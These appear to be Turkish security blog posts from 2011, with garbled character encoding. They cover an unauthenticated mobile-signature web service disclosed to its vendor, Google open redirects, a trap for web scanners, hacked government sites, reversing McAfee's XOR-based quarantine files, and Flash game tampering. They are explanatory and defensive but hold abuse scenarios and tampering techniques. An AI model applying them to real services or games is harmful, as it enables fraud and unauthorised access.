Ağırlıklı olarak xml tabanlı olan web servisler genelde iki farklı uygulamanın birbiri ile ortak bir dil uumlzerinden haberleşmesi amacıylakullanılmaktadır Bu sayede farklı programlama dilleri ile yazılmış iki uygulama birbirleri ile haberleşirken bir web servis kullanarakhaberleşme esnasında ortaya ccedilıkabilecek yazılımsaltasarımsal uyumsuzlukları veya engelleri ortadan kaldırmaktadır

Ccediloğunlukla son kullanıcı bir web uygulaması ile etkileşimde bulunurken arka planda bu uygulama kullanıcıya sunacağı iccedileriği farklısunuculardan web servis aracılığı ile toplamakta ve harmanladıktan sonra kullanıcıya sunmaktadır

Web servis denilince ccediloğu kişinin aklına XML ve SOAP gelmektedir SOAP XML kullanarak uygulamalar arası bilgi alışverişinin nasılsağlayacağını tanımlayan bir standart bir protokolduumlr XML ise veri goumlstermek amacıyla kullanılan HTMLin aksine veri taşımak vesaklamak iccedilin kullanılan bir dildir

Web servislerine youmlnelik tehditlerin başında XML enjeksiyonu XPath enjeksiyonu XML bombası paramatre manipuumllasyonu WSDLtaraması ve daha bir ccedilok tehdit gelmektedir

Web Services Description Language (WSDL) bir web servis ile iletişim kurulabilmesi iccedilin gerekli parametreleri metodları iccedilerirWSDLi dış duumlnyaya accedilık olan bir web servis uumlzerinde yer alan servis yukarda bahsi geccedilen tehditlere mağruz kalabildiği gibi servisinve hizmetin koumltuumlye kullanımını da yol accedilabilmektedir

Oumlrnek olarak X firmasının sitesinde yer alan bir gsm firmasına ait olan imzalama yazılımına kısaca goumlz atalım

Bu imzalama programı mobil imza kullanıcılarının kişisel bilgisayarlarındaki dosyaları cep telefonları aracılığıyla elektronik olarakimzalamalarını ve kendilerine gelen elektronik imzalanmış dosyaları doğrulamalarını sağlayabilen kurulumu ve kullanımı oldukccedila basitolan bir yazılımdır

Mobil İmza kullanma gayesiyle goumlz attığım bu yazılımın doğrudan bir web servis ile haberleşiyor olması ister istemez dikkatimi ccedilekmişticcediluumlnkuuml kurumsal ağlarda ve guumlvenli tasarlanan yazılımlarda son kullanıcının web servis ile muumlnasebet kurması ccedilok tercih edilmemektedir

26

WSDL dosyasına baktığımda KullanıcıVarMi ImzaIleLisansAl VarOlanLisansiGetir servisleri ilgimi ccedilekti Normal şartlarda imzalamauygulaması kullanılarak ccedilağrılabilecek bu servisler WSDLden elde edilen bilgiler ile istenildiği taktirde herhangi bir http isteği yapanbir araccedil uumlzerinden de ccedilağrılabilir Kısaca imzalama uygulaması yerine isteyen kendi uygulamasını hazırlayarak bu servisleri ccedilağırabilirve uygulama uumlzerinde yer alan kısıtlamalardan etkilenmeyebilir

Aklıma gelen ilk soru art niyetli bir kişi başkasına ait olan bir lisansı VarOlanLisansiGetir servisini ccedilağırarak getirebilir miydi Busorunun yanıtını her ne kadar merak etsem de etik accedilıdan doğru olmayacağını duumlşuumlnduumlğuumlm iccedilin aramaktan vazgeccediltim Bunun yerineKullanıcıVarMi servisi ile bir kaccedil sorgu gerccedilekleştirdim Bu servisin bir gsm şirketine ait olan herhangi bir telefon numarası ile ccedilağrılmasıdurumunda sunucudan true (var) ya da false (yok) şeklinde yanıt geldiğini goumlrduumlm Servisin ccedilalışıp ccedilalışmadığını teyit etmek iccedilin elimdemobil imza kullanan ve kullanmayan iki farklı cep telefonu numarası ile deneme gerccedilekleştirdim ve servisin ccedilalıştığını teyit ettim

27

Servisin bu şekilde isteyen herkes tarafından kullanılabiliyor olmasının art niyetli kişiler tarafından nasıl istismar edilebileceğiniduumlşuumlnmeye koyulduğumda aklıma gelen ilk senaryo şu şekilde oldu Bildiğiniz gibi man in the mobile saldırısı gerccedilekleştiren Zeusbankacılık trojanı kullanıcının cep telefonuna SMS şifresini ccedilalmak iccedilin bir trojan goumlndermektedir Boumlyle bir servisin halka accedilık olarakhizmet vermesi durumunda bu servisten faydalanan zararlı bir yazılım koumlruuml koumlruumlne kurbana ait olan cep telefonu numarasına SMSşifresini ccedilalan trojan goumlndermek yerine oumlncelikle bu servisi ccedilağırarak mobil imza kullanıcısı olup olmadığını teyit edebilir ve yanıtagoumlre mobil imza uygulamasını hedef alan zararlı bir yazılım goumlnderebilir Bu servisin bu şekli ile kullanılmasının bir gsm firmasınaait mobil imza kullanan banka muumlşterilerinin ve bankaların doğru bulmayacağını duumlşuumlnerek konuyu hemen X firmasına bildirmekiccedilin sayfalarında yer alan e-posta adresine bir e-posta goumlnderdim Bu adrese goumlnderilen e-postaları kontrol etmeyeceklerini duumlşuumlnerek(Tuumlrkiye gerccedileği) biraz araştırma yaparak genel muumlduumlruumln e-posta adresini bularak kendisine konu ile ilgili iletişim kurabileceğim biryetkilinin bilgisini oumlğrenmek iccedilin ayrı bir e-posta goumlnderdim Ancak iki hafta iccedilinde tarafıma herhangi bir geri doumlnuumlş yapılmadığı iccedilinbu servisin art niyetli kişiler tarafından bu şekilde kullanılmasını en kısa suumlrede engelleyebilmek adına bu yazıyı yazma ve ilgililerigoumlreve ccedilağırma misyonunu uumlstlendim

Yazının giriş kısmında da belirttiğim uumlzere web servislerin sadece uygulamalar arasında kullanılıyor olması ve son kullanıcı kullanımınakısıtlanıyor olması bu tuumlr tehditleri berteraf edilmesine yardımcı olacaktır

Bir sonraki yazıda goumlruumlşmek dileğiyle

[28-03-2011] Guumlncelleme Firma genel muumlduumlruumlnuumln buguumln itibariyle tarafımla iletişime geccedilmesi ve firma isimlerinin yazıda geccedilmesindenoumltuumlruuml duyduğu rahatsızlığı dile getirmesi uumlzerine yazıda geccedilen firma isimleri sansuumlrlenmiştir Gerekli goumlruumllmesi durumunda ilerleyenzamanlarda kendileri ile gerccedilekleştirilen yazışmalara yer verilebilir

Googlersquoa Bile GuumlvenmeSource httpswwwmertsaricacomgooglea-bile-guvenmeBy MS on March 7th 2011

Milliyetcomtr web sitesinde yer alan bir haberde dolandırıcıların Gelir İdaresi Başkanlığına (wwwgibgovtr) ait olan internetvergi dairesi sitesinin bir kopyasını oluşturdukları ve benzer bir alan adı altında (wwwgibgentr) site kurarak insanları dolandırmaya

28

ccedilalıştıkları ortaya ccedilıkmış İşin ilginccedil yanı ise bu sahte sitenin Google arama motorunda motorlu taşıtlar vergisi anahtar kelimesi ileyapılan aramalarda ilk sırada ccedilıkabilmesi iccedilin dolandırıcılar tarafından Googlea reklam verilmiş olması

Aslında yıllardan beri Google arama motoru uumlzerinde zararlı kod yayan sitelerden dolandırıcılık amacıyla kurulmuş olan sitelere kadarbir ccedilok zararlı sitenin kullanıcıları benzer youmlntemler ile hedef aldığı bilinmektedir Googleda bunlar karşısında boş durmayarak zararlıkod yayan siteleri tespit etmekte ve arama sonuccedillarına ilgili site iccedilin ufak bir ibare ekleyerek ziyaret edilmek istenen sitenin pek teguumlvenilir olmadığı konusunda kullancıları bilgilendirmektedir

Zararlı ve sahte sitelerin ister istemez Google arama sonuccedillarında yer alabilmesi kullanıcılar iccedilin tehlike oluştururken bence koumltuumlyekullanılabilecek bir diğer tehlike ise Google arama motorunda yer alan kendimi şanslı hissediyorum arama oumlzelliğidir Herhangi biranahtar kelime yazıp (web adresi de olabilir) bu butona basacak olursanız anahtar kelimeniz ile ilişkili olan ilk web sitesine youmlnlendiğinizi(URL Redirection) goumlrebilirsiniz

Her ne kadar Google ip adreslerine youmlnlendirme yapmıyor olsa da anahtar kelime olarak yazının başında bahsetmiş olduğumdolandırıcılar tarafından kurulan web sitesinin adresini yazmanız durumunda bu adrese sizi seve seve youmlnlendirecektir

Google Uumlzerinden Youmlnlendirme Oumlrneği (Kendimi Şanslı Hissediyorum) Kendini şanslı hissediyor musun

Kendimi şanslı hissediyorum youmlnlendirmesine ilave olarak Google arama motoru uumlzerinde başka bir youmlnlendirme daha mevcut OumlrneğinFirefox internet tarayıcısı uumlzerinde adres ccedilubuğuna root yazıp enter tuşuna basacak olursanız kendinizi httprootcernchdrupalsitesinde bulduğunuzu goumlrebilirsiniz Yine arka tarafta bunun nasıl ccedilalıştığına bakacak olursak adres ccedilubuğuna yazacağınız bir kelimearka tarafta Google arama motoruna giderek sizi bu anahtar kelime ile ilişkili olan site başlığına (title) sahip ilk siteye youmlnlendirmektedir

Google Uumlzerinden Youmlnlendirme Oumlrneği Googlea bile guumlvenme

Sonuccedil olarak bu tuumlr kontrolsuumlz URL youmlnlendirmelerinin phishing saldırılarından istismar paketlerine (exploit pack) youmlnlendirmeye kadarkoumltuumlye kullanıldığına bir ccedilok defa tanık olmuştum ancak Google arama motorunun bu tuumlr saldırılara imkan tanıyacak bir tasarıma sahipolduğu buguumlne dek hiccedil dikkatimi ccedilekmemişti Siz siz olun gelen bağlantı adresi googlecomgooglecomtr iccedileriyor diye koumlruuml koumlruumlnetıklamayın

Bir sonraki yazı ile goumlruumlşmek dileğiyle

Script Kiddie Bezdirme MekanizmasıSource httpswwwmertsaricacomscript-kiddie-bezdirme-mekanizmasiBy MS on February 27th 2011

Guumlnuumlmuumlzde internete accedilık web sitelerinin kaderinde ya Ccedilin uumlzerinden ya da Rusya uumlzerinden en az bir defa taranmak vardır Bunu webuygulamaları uumlzerindeki zafiyetleri otomatik olarak tespit etmek ve istismar etmek uumlzere hazırlanmış bir solucan (worm) yaptığı gibiproxy arkasına gizlenmiş meraklı bir script kiddie de yapıyor olabilir

Benim sitem de zaman zaman meraklı arkadaşların ilgi alanına girmekte ve Netsparkerdan Acunetixe kadar bir ccedilok ticari webuygulaması guumlvenlik tarayıcıları (web application security scanner) ile taranmaktadır Her ne kadar bu zamana dek bu durumdamşikayetccedili olmasamda kendimi şikayet edenlerine yerine koyarak acaba bu script kiddielerin işlerini mod_security ve benzer karmaşıkyoumlntemlere başvurmadan nasıl zorlaştırabilirim sorusuna yanıt aramaya koyuldum

Script kiddienin ticari araccedillar ile tarama işlemini simuumlle etmek iccedilin ilk olarak Windows işletim sistemi yuumlkluuml olan sanal makine iccedilinebir web sunucusu kurmam gerekiyordu ve seccedilimimi WAMPtan yana kullandım Daha sonra demo suumlruumlmuuml ile bu web sunucusunutarayabilecek meşhur ticari bir tarama aracı aramaya başladım Eskiden web uygulaması guumlvenlik tarayıcısı denilince akla ya HPfirmasının satın aldığı Spi Dynamics firmasının Webinspect uumlruumlnuuml ya da IBM firmasının satın aldığı Watchfire firmasının Appscan uumlruumlnuumlgelirdi Her ne kadar HP satın alana dek Webinspectin hayranı olsam da bu senaryoda IBMin Appscan demo uumlruumlnuumlnuuml kullanmayakarar verdim

Başka bir sanal makineye Appscan uumlruumlnuumlnuuml kurduktan sonra diğer sanal makinemde kurulu olan web sunucusunu tarayabilmek iccedilinufak bir numara ile httpdemotestfirenet sitesini taranacak sanal makinemin ip adresine youmlnlendirdim ve zorlaştırma youmlntemi uumlzerineduumlşuumlnmeye başladım (Webinspect ve Appscan araccedillarının demo suumlruumlmleri ile sadece kendi demo sitelerini (Appscan iccedilin httpdemotestfirenet web adresi Webinspect iccedilin httpzerowebappsecuritycom web adresi) tarayabilmektesiniz)

Penetrasyon testlerinde karşılaşmak istemeyeceğiniz durumlardan biri uzun suumlren taramanın tamamlanmasına yakın tarama aracınıngoumlccedilmesi bir diğeri ise taranan sitenin ccedilok buumlyuumlk olması ve isteklere geccedil yanıt veriyor olması nedeniyle taramanın saatlerce suumlrmesidirKorsanlar ve script kiddieler genellikle sabırsız insanlardır bu nedenle hedefe bir an oumlnce sızmak iccedilin en kestirme en hızlı yoluseccedilmektedirler Bunu goumlz oumlnuumlnde bulundurarak tarama aracının 10 dakikada tarayabileceği bir siteyi ufak bir numara ile saatler iccedilindetaramasını sağlayabilmenin script kiddieyi bezdirebileceği duumlşuumlncesiyle Appscani biraz etuumlt etmeye başladım

Appscan ccedilalışma prensibi gereği hedef web sitesini taramaya başlamadan oumlnce site uumlzerinde keşfe ccedilıkmakta ve sitenin haritasınıccedilıkarmaktadır Keşif aşaması tamamlandıktan hemen sonra tarama işlemine geccedilmekte ve bu aşamada yeni bir bağlantı adresi (link) ilekarşılaşması durumunda bu adresi otomatik olarak taranacaklar listesine dahil etmektedir Durum boumlyle olunca acaba bir web sayfasıhazırlasam ve bu sayfa her ziyaret edildiğinde rastgele bağlantı adresi uumlretiyor olsa bu sayfayı ziyaret eden Appscan yeni bağlantı adresi-gt tara -gt yeni bağlantı adresi -gt tara şeklinde sonsuz bir doumlnguumlye girer mi sorusuna yanıt aramaya başladım

29

Bunun iccedilin oumlncelikle httpdconf uumlzerinde oumlzel bir hata sayfası oluşturdum (missingphp) ki bulamadığı her sayfa iccedilin otomatik olarakmissingphp sayfasına youmlnlendirilsin ve bu sayfada uumlretilen rastgele 100 bağlantı adresi sayesinde sonsuz doumlnguumlye girebildin Bir kaccedildeneme sonucunda Appscani doumlnguumlye (sonsuz olabilir) sokan sayfayı oluşturdum ve muradıma erdim

httpdconf uumlzerinde oumlzel hata sayfası belirtme

Oluşturduğum web sayfaları

30

Normal şartlarda 2 dakikada taranabilen bir sayfa 46 dakika sonunda halen taranmaya ve ziyaret edilecek URL (resimde sol alt koumlşeyedikkat) sayısı artmaya devam ediyor (doumlnguuml)

31

Benzer sorun diğer ticari web uygulaması guumlvenlik tarayıcılarında var mı diyerek Netsparker ve Acunetix araccedillarına baktığımda bununAppscane oumlzguuml bir sorun olduğu ve bunun yanında başka bir sorun daha dikkatimi ccedilekti Misal ekran goumlruumlntuumllerinde yer alan JSklasoumlruumlnuumln aslında geccedilerli var olan bir klasoumlr olmamasına rağmen Appscan ve Acunetix araccedilları Netsparkerın aksine site haritalarınavar olmayan klasoumlrleri ekleyerek goumlruumlntuuml kirliliği yaratmakta ve site haritasının kullanımını zorlaştırmaktalar

Sonuccedil olarak sitenizin bu tuumlr otomatik araccedillar ile taranmasından rahatsız oluyorsanız bu araccedilları inceleyerek zayıf noktalarını keşfedebilirve site keşfini zorlaştıracak basit numaralara ile script kiddieleri canlarından bezdirebilirsiniz )

Bir sonraki yazıda goumlruumlşmek dileğiyle herkese iyi haftasonları dilerim

Not Uumlretilen bağlantı adreslerine benim yaptığım gibi isim (link text) vermez iseniz kullanıcıların yanlışlıkla bu bağlantı adreslerinetıklamasını engelleyebilirsiniz

Devletrsquoin Sitesi DenizhellipSource httpswwwmertsaricacomdevletin-sitesi-denizBy MS on February 20th 2011

Bilenleriniz bilirler geccediltiğimiz ay Bilgi Teknolojileri ve İletişim Kurumu (BTK) ve TUumlBİTAKın kurum ve kuruluşların bilgisistemlerine youmlnelik siber saldırılara karşı savunma guumlcuumlnuuml tespit etmek iccedilin Ulusal Siber Guumlvenlik Tatbikatı duumlzenledi ve 4guumln boyunca suumlren bu tatbikatta BTK ve TUumlBİTAK tarafından oluşturulan ekip 41 kamu ve oumlzel sektoumlr kurumkuruluşunun bilgisistemlerine gerccedilek saldırılar duumlzenledi

Bir yanda ulusal siber guumlvenlik tatbikatı duumlzenlene dursun diğer yanda vatandaşlarımızın her guumln ziyaret ettiği ve bilgi paylaşımındabulunduğu honeypot gibi kurulan ve youmlnetilen onlarca devlet sitesi art niyetli kişiler tarafından gerccedilek saldırılara maruz kalmakta vebu sitelersistemler uumlzerinde saklanan veriler art niyetli kişilerin eline geccedilmektedir

Duumlnya genelinde hack edilen sitelerin arşivini (kendilerine bildirilmesi kaydıyla) tutan Zone-H sitesine goumlz atacak olursanız kimi zamanguumlnde onlarca govtr uzantılı devlet sitemizin hack edildiğini goumlrebilirsiniz Zaman zaman bu siteye goumlz atan biri olarak geccediltiğimiz ayEnerji ve Tabii Kaynaklar Bakanlığına ait olan wwwenerjigovtr sitesinin youmlnetici panelinin hack edildiğine dair bir giriş goumlrduumlm veduyarlı bir vatandaş olarak 24 Ocak tarihinde hemen TR-BOME ekibine (bilgisayar olaylarına muumldahale ekibi) web siteleri uumlzerinden

32

durumu bildirdim Olayın en kısa suumlrede ccediloumlzuumllmesi iccedilin Enerji ve Tabii Kaynaklar Bakanlığı ile iletişime geccedilmek yerine TR-BOMEile iletişime geccedilmeyi tercih etmeme rağmen halen youmlnetici panelinin internete accedilık ve erişilebilir olmasının bir vatandaş olarak beniuumlzduumlğuumlnuuml soumlylemek isterim

Zone-H sitesi uumlzerinden elde ettiğim bilgiler ışığında hack edilen devlet sitelerimiz ile ilgili istatistiki bilgileri bir araya getirecekolursam

bull 10032010 - 16022011 Zone-He bildirilmiş hack edilen devlet sitelerinin sayısı 1250

bull 2010 yılının Mart ayında 50 Nisan ayında 72 Mayıs ayında 396 Haziran ayında 67 Temmuz ayında 86 Ağustoz ayında 77 Eyluumll ayında 118 Ekim ayında 72 Kasım ayında 59 Aralık ayında 85 devlet sitesi hack edilmiş

bull 2011 yılının Ocak ayında 88 ve Şubat ayının yarısında ise 80 devlet sitesi hack edilmiş

bull Hack edilen 1250 devlet sitesinden 536 tanesi Linux 320 tanesi Windows 2003 333 tanesi Windows 2008 31 tanesi Windows2000 7 tanesi Unix işletim sistemi uumlzerinde barındırılıyormuş

Boumlyle vahim bir tablo karşısında devletin kendi kaynakları ile (Tuumlbitak) sitelerini iccedil ve dış tehditlere karşı acil olarak denetlemesigerekirken geccediltiğimiz ay Bankacılık Duumlzenleme ve Denetleme Kurumu (BDDK) 49 bankadan Tuumlbitaka 6 ay iccedilinde sızma testiyaptırmasını talep etti Bir yanda honeypot haline gelmiş devlet sitelerinin iccediller acısı hali diğer bir yanda guumlvenlik kontrollerinin ccedilok sıkıolduğu ve senede bir ccedilok defa iccedil ve dış guumlvenlik denetimlerinden geccedilen bankaların ilave olarak devlet kaynakları ile de denetlenmesiyorumu sizlere bırakıyorum

Bir sonraki yazıda goumlruumlşmek dileğiyle

Virusscan BUP Restore UtilitySource httpswwwmertsaricacomvirusscan-bup-restore-utilityBy MS on February 12th 2011

Bana goumlre korsanların (konumuz her zamanki gibi etik olanlar) başarılı olabilmeleri iccedilin yuumlksek hayal guumlcuumlne ve yaratıcı zekaya sahipolmaları gerekmektedir Karşılaştıkları engelleri aşmak ve başarıya ulaşmak iccedilin uumlretecekleri senaryolar hayal guumlccedilleri ile bu senaryolarıhayata geccedilirmeleri ise yaratıcılıkları ile muumlmkuumln olabilmektedir Nedense hayal guumlcuuml ile zafiyet keşfetme becerisini yaratıcılık ile iseprogramlama becerisini oumlrtuumlştuumlrmuumlşuumlmduumlr ve bu yuumlzden etik bir korsan olarak bu becerilerimi geliştirmek iccedilin zaman zaman senaryolaruumlreti zaman zamanda karşıma ccedilıkan fırsatları değerlendirmeye ccedilalışırım

Yine guumlnlerden bir guumln şuumlpheli bir duruma karşı kullanıcılardan gelen antivirus alarmlarına goumlz atarken kullanıcılardan gelen fazlasayıda alarm dikkatimi ccedilekti Zararlı yazılım analizinden oldukccedila keyif alan kahramanımız Mert fırsat bu fırsat Jedi duyuları ile hareketederek alarmların kaynağını aramaya koyuldu ve alarmların arkasında bu kullanıcıların ortak olarak ziyaret ettiği bir web sitesi olduğuanlaşıldı Web sitesini ziyaret eden kahramanımızın antivirus programı da aynı alarmı verince dosya uumlzerinde detaylı bir analiz yaptıktandurumun yanlış alarmdan (false positive) ibaret olduğunu anladı ve adli bilişim analizi yapma hevesi kursağında kaldı

Peki ya durum biraz daha farklı olsaydı Kahramanımızın kullandığı antivirus yazılımı Mcafee Virusscan olsaydı ve Virusscan tespitettiği zararlı yazılımları karantinaya alıyor olsaydı ayrıca kahramanımızın antivirus uumlzerindeki yetkileri (dosyayı karantinadan ccedilıkarmayetkisi) kısıtlı olsaydı bu durumda ne yapması gerekirdi

Antivirus sistemini youmlneten kişiden ilgili dosyayı restore etmesini ve analiz iccedilin kendisine iletmesini talep edebilir (e-posta ve telefontrafiği) veya sanal makine iccedilindeki işletim sistemine Virusscan kurabilir ve onun uumlzerinde restore edebilir (oumllme eşeğim oumllme) veyakarantina mekanizmasının nasıl ccedilalıştığını tersine muumlhendislik ile ccediloumlzerek bunu otomatize hale getiren bir araccedil hazırlayabilir (bildiğimkararıyla piyasada boumlyle bir araccedil yok veya ben aradığım zaman yoktu) ve yeri geldiğinde bunu adli bilişim analizlerinde kullanılabilirdi(hedef diskten karantinaya alınmış dosyaları kopyalamak ve incelemek size guumlzel ipuccedilları verebilir şayet analize elverişli biccedilimde disklesaklanmış ise)

Karantina işleminin nasıl yapıldığından kısaca bahsedece olursak Virusscan karantinaya aldığı dosyayı CQUARANTINE klasoumlruumlnefarklı bir ad altında kopyalamakta ve uzantı olarak BUP kullanmaktadır (Oumlrnek 7db11a1031283c50bup) Karantinaya alınanbir dosyayı herhangi bir hex editoumlruuml ile inceleyecek olursanız iccedileriğin ve dosya boyutunun orjinalinden farklı olduğunu anlamlıkarakterlerden oluşan diziler (string) ortadan kaybolmuş olduğunu goumlrebilirsiniz

33

Karantina mekanizmasının nasıl ccedilalıştığını hızlıca anlamaya ccedilalıştığımda karantinaya alınan ve BUP uzantısı ile saklanan dosyanın j(hex 6A) karakteri ile XOR işleminden geccedilirildiğini anlamam ccedilok zor olmadı

34

Hex Workshop ile karantinaya alınmış dosyayı 6A ile XOR işleminden geccedilirdikten sonra ortaya anlamlı karakterler oluşan dizilerccedilıkıverdi

35

Orjinal dosya ile XOR işleminden geccedilirilmiş dosyayı karşılaştırdığımda XORlanmış dosyanın ilk 2560 baytında detaylı bilgiler (orjinaldosyanın adı karantinaya alınma tarihi virusun adı vs) saklandığını goumlrduumlm Daha sonrasında ise programın orjinali saklanıyordu(Tam olarak orjinali diyemiyorum ccediluumlnkuuml her 65536 baytta bir 512 bayt buumlyuumlkluumlğuumlnde ccediloumlp veri araya (junk) sokuşturulmuş ve bunlarıayıklamam gerekti)

Hem detaylı bilgileri goumlsteren hem de karantinaya alınmış olan dosyayı orjinal haline ccedileviren bir program hazırlamak iccedilin işekoyulduğumda ortaya bup_recoverypy aracı ccedilıktı

36

Program iki komut (restore ve view) ile ccedilalışıyor ve kullanımı yine ccedilok basit İlk olarak yapmanız gereken karantinaya alınmış dosya ilebup_recoverypy programını aynı klasoumlre kopyalamanız Restore komutu ile hem detaylı bilgileri goumlrebilir hem de karantinaya alınmışprogramı orjinal haline ccedilevirebilirsiniz View komutu ile sadece detaylı bilgileri goumlrebilirsiniz

Oumlrnek bup_recoverypy restore 7db11a1031283c50bup

Programı buradan indirebilirsiniz

Bir sonraki yazıda goumlruumlşmek dileğiyle herkese iyi hafta sonları dilerim

Not Zaman zaman senaryolarımda Mcafee antivirus yazılımına yer veriyor olmamın nedeni uzun yıllarca kullanmış olmamdır başkabir nedeni yoktur )

Hackerlarrsquoın Goumlzuumlnden Flash UygulamalarıSource httpswwwmertsaricacomhackerlarin-gozunden-flash-uygulamalariBy MS on January 30th 2011

Ah o Netsec etkinliğinde bende olsaydım deyipte katılamayanlar iccedilin yapmış olduğum sunumu kısaca yazıya doumlkmeye karar verdim

Oumln bilgi olarak Flash kısaca web sayfalarına animasyon video ve etkileşim eklemek amacıyla kullanılan ve Actionscript adında nesneyoumlnelimli (object oriented) programlama dili iccedileren bir multimedya platformudur Flash uygulamalarına ccediloğunlukla reklamlarda veoyunlarda rastlarız Flash dosyaları ccediloğunlukla SWF (ShockWave Flash) formatında olur ve aslında bir sanal makine olan Flash oynatıcısıtarafından ccedilalıştırılır Flash oynatıcısının bir sanal makine olması sayesinde SWF formatındaki bu dosyalar her platformda ccedilalıştırılabilirDurum boumlyle olunca Javada da olduğu gibi SWF formatındaki bir dosya kolaylıkla baytkoddan (bytecode) kaynak koduna ccedilevrilebilir(decompile) Actionscript ilk olarak animasyonları kontrol etmek iccedilin tasarlanmıştır fakat geliştirilen yeni suumlruumlmleri ile web tabanlıoyunlardan goumlruumlntuuml ve ses yayını yapmaya imkan tanıyan zengin internet uygulamaları geliştirilebilmesine imkan tanımaktadır veJavascript ile aynı kodlama imlasına (syntax) sahiptir Actionscriptin 2 suumlruumlmuuml Flash oynatıcı 8 ve oumlncesi suumlruumlmlerde 3 suumlruumlmuuml ise9 ve sonrası suumlruumlmlerde ccedilalışmaktadır

Aralık 2010 yılında Millward Brown tarafından gerccedilekleştirilen ankete goumlre Adobe Flash oynatıcısı internet erişimi olan bilgisayarların99unda yuumlkluumlymuumlş Anket bir yana zaten guumln iccedilinde gezdiğimiz sitelerin iccedileriğine biraz daha dikkat edecek olursak ccediloğunda Flashile geliştirilmiş bir kısım olduğunu goumlrebiliriz Web uygulama guumlvenliğinde ccediloğunlukla Flash uygulama guumlvenliği goumlz ardı edilmekteve art niyetli kişilerin hedefi haline gelebilmektedir

Oumlrnek olarak Flash ile geliştirilmiş oyunları ele alarak art niyetli kişilerin ccediloğunlukla yoğunlaştığı noktalara kısa goumlz atalım

bull Flash oynatıcı ile sunucu arasında gerccedilekleşen trafiğin manipuumlle edilmesi Oumlzellikle Flash ile geliştirilmiş olan oyunlarda istemcitarafına guumlvenilerek kontrollerin istemci tarafında gerccedilekleştirilmesi sağlanmakta ve istemci tarafında işlenen veri sorgusuz sualsizsunucu tarafında işleme alınmaktadır Durum boumlyle oluncada oumlduumllluuml oyunlarda ve yarışmalarda bu durumu istismar eden hilecilerortaya ccedilıkmakta ve haksız kazanccedil sağlamaktadırlar Oumlrnek olarak aşağıdaki ekran goumlruumlntuumlsuumlnde yer alan oyunu inceleyecekolursanız sunucudan istemci tarafına sorulara ilave olarak yanıtların da goumlnderildiğini goumlrebilirsiniz Bu trafiği goumlrebilmek vegerekirse manipuumlle edebilmek iccedilin yapmanız gereken Burp Paros ve benzer proxy araccedilları ile internet tarayıcısı ile sunucusuarasına girmektir

37

38

bull Kaynak koduna ccedilevirme Az oumlncede bahsettiğim gibi baytkod olmasından oumltuumlruuml Flash uygulamalarını kaynak koduna 3 parti biraraccedil ile ccedilevirmek oldukccedila kolaydır bu nedenle uygulama iccediline statik kullanıcı adı ve şifre koymak doğru bir yaklaşım olmaz Aşağıdaki ekran goumlruumlntuumlsuuml bu hatayı goumlzler oumlnuumlne seren guumlzel bir oumlrnek olabilir

39

40

bull Hafızaya muumldahale etme Diğer tuumlm uygulamalarda olduğu gibi Flash uygulamaları tarafından kullanılan verilerin bir kısmıdahafızada saklanmaktadır Hafızaya muumldahale ederek uygulamanın akışını değiştirmek sahip olmadığınız bir yetkiye sahipolabilmek muumlmkuumln olabilir Oumlzellikle oyunlarda hafızaya muumldahale ederek guumlcuumlnuumlzuuml yuumlkseltmek veya sanal paranızı arttırmakhaksız kazanca yol accedilabilir Aşağıdaki ekran goumlruumlntuumlsuumlnde bu amaccedilla kullanılan Cheat Engine aracı ile bir Poker oyununda sahipolunan paranın nasıl yuumlkseltilebildiğini goumlrebilirsiniz Bunun iccedilin yapmanız gereken o an sahip olduğunuz paranın karşılığınıhafızada bulmak ve istediğiniz değer ile değiştirmektir

41

42

bull Tersine ccedilevirme(disassembling) Flash uygulamasına ait SWF dosyasını analiz etmek iccedilin kaynak koduna ccedileviremediğimizdurumlarda baytkodu okunabilir hale ccedilevirebilir ve analizimizi gerccedilekleştirebiliriz Analizle yetinmeyerek baytkoda muumldahaleedebilir ve SWF dosyasını yamayabiliriz Kaynak koduna ccedilevirdiğimiz ancak tekrar derleyemediğimiz durumlarda da bu yolabaşvurabiliriz Bu iki durumda da hem tersine ccedilevirme hem de yamama iccedilin RABCDasm aracından faydalanabilirsiniz Oumlrnekolarak bir oyun duumlşuumlnuumln kaynak koduna ccedilevirmek muumlmkuumln ve analiz neticesinde youmlnetim paneli SWF dosyasının iccedilinde yeralıyor ancak uygulamayı derleyenler tarafından bu youmlnetim paneline ulaşmak muumlmkuumln değil ccediluumlnkuuml bu actionscriptte yer alan vebu panel ile ilgili olan fonksiyon oyunun yuumlklenmesi esnasında goumlruumlnuumlr değil Ancak bu dosyayı tersine ccedilevirerek (disassembling)muumldahale edebilirseniz (patching) bu panelin yuumlklenme esnasında goumlruumlnuumlr hale gelmesini sağlayabilir ve youmlnetici panelineerişebilirsiniz İşte tam olarak bu durumu konu alan bir zafiyeti geccediltiğimiz aylarda kaşfederek oyunu geliştiren firma ile paylaştımve duumlzeltilmesini sağladım (Firma ccedilalışanlarının samimi ve profesyoumlnelce yaklaşımından dolayı kendilerini tebrik etmeden

43

geccedilmeyeceğim Farkındalığın arttırılması adına firma adını gizleyerek videoyu yayınlamamı sağladıkları iccedilinde kendilerine ayrıcateşekkuumlr etmek isterim

bull Zafiyet tarama araccedilları Actionscript programlama dilide guumlvenli bir şekilde kullanılmadığı taktirde XSS XSRF gibi zafiyetlereyol accedilabilmektedir Oumlzellikle URL kabul eden işleyen fonksiyonlarda ve HTML kullanılan parametrelerde bu zafiyetlere sıkccedilarastlayabiliriz Oumlrnek olarak Flash ile hazırlanmış olan reklamlarda kullanılan clickTAG değişkeni guumlvenli kullanılmadığı taktirdeXSS zafiyetine yol accedilabilmektedir Bu ve benzer sorunları tespit etmek iccedilin Actionscript kodunu detaylı olarak analiz etmek gerekirancak bu zaman alıcı bir iş ve ccediloğu kimse iccedilin uzmanlık gerektirebildiği iccedilin bunu gerccedilekleştiren programlardan faydalanabilirizHP SWFScan bu amaccedilla geliştirilmiş hedef SWF dosyasını tersine ccedilevirerek analiz eden ve 60dan fazla guumlvenlik zafiyetinitespit edebilen ve raporlayabilen faydalı bir araccediltır Aşağıdaki ekran goumlruumlntuumlsuumlne bakacak olursanız rastgele olarak seccedililmiş oumlrnekbir sitedeki SWF dosyasında yer alan XSS (cross-site scripting) guumlvenlik zafiyetini başarıyla tespit edebildiğini goumlrebilirsiniz(SWFScan Actionscript 2 ve 3 suumlruumlmlerini desteklemektedir 2 suumlruumlmuuml iccedilin ayrıca SWFIntruder aracınıda kullanabilirsiniz) Butuumlr araccedillar kimi zaman guumlvenlik zafiyetlerini tespit edemeyebilirler bu nedenle her ihtimale karşı actionscripti analiz etmekte yararolduğunu soumlyleyebilirim

44

